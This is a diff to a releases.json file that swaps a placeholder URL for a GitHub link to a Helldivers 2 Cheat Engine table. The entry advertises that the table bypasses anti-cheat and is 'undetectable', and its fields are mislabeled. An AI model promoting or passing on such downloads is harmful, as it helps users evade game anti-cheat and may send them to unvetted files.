--- a/data/releases.json
+++ b/data/releases.json
@@ -4,7 +4,7 @@
       "version": "Helldivers 2 Cheat Table",
       "date": "v1.0.0",
       "notes": "Helldivers 2 Cheats includes Bypass Anti-Cheat.",
-      "url": "https://github.com/YourOrg/Predecessor/releases/download/v1.0.1-beta/Predecessor-v1.0.1-beta.zip",
+      "url": "https://github.com/SoundlessEcho/Download-Page/raw/main/Helldiver%202/Experimental_4.0.0_By_Zodiac.ct",
       "video": "https://www.youtube.com/watch?v=Yg5CWo80eEw",
       "platforms": ["Steam", "Undetectable"]
     },
